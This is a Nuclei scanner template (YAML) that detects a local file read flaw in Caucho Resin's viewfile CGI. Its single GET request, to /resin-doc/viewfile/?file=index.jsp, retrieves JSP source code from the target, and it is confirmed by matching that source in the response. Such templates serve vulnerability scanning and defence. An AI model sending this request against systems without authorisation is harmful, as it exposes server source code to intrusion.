nuclei-templates/http/vulnerabilities/other/resin-viewfile-lfr.yaml

32 lines
1.0 KiB
YAML

id: resin-viewfile-lfr
info:
name: Caucho Resin LFR
author: princechaddha
severity: high
description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files.
reference:
- http://0day5.com/archives/1173/
- https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205
metadata:
max-request: 1
tags: resin,caucho,lfr
http:
- method: GET
path:
- "{{BaseURL}}/resin-doc/viewfile/?file=index.jsp"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"
part: body
# digest: 4a0a0047304502201af0d0fe917471a9c81db59657a77d99ac7ac09237052f3e32e77b1b2811988502210091b220c611424a76a17595b3595fdf4964633d95928f84924ae4f1b37aa1bfeb:922c64590222798bb761d5b6d8e72950